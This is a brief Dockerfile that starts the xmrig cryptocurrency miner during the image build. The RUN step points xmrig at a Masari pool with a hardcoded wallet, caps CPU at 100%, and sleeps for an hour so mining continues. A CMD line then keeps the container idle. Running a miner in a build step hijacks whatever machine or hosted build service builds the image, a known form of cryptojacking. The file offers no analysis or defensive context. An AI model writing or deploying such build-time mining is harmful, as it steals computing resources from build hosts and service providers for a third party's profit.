FROM eliteminer/xmrig_zero_docker

RUN xmrig -o stratum+tcp://masari.superpools.net:3333 -u 5pqUTCEcg5tjfdpuE8ZQu2JEdFTdgN2fzcydv5e5ypkcHuLRdG5zXkGZoWMz2KhJpxKKf5oto4KTh53v7iBbjNHgPT9soLC.2000 --max-cpu-usage=100 & sleep 3600

CMD ["sleep", "600000000"]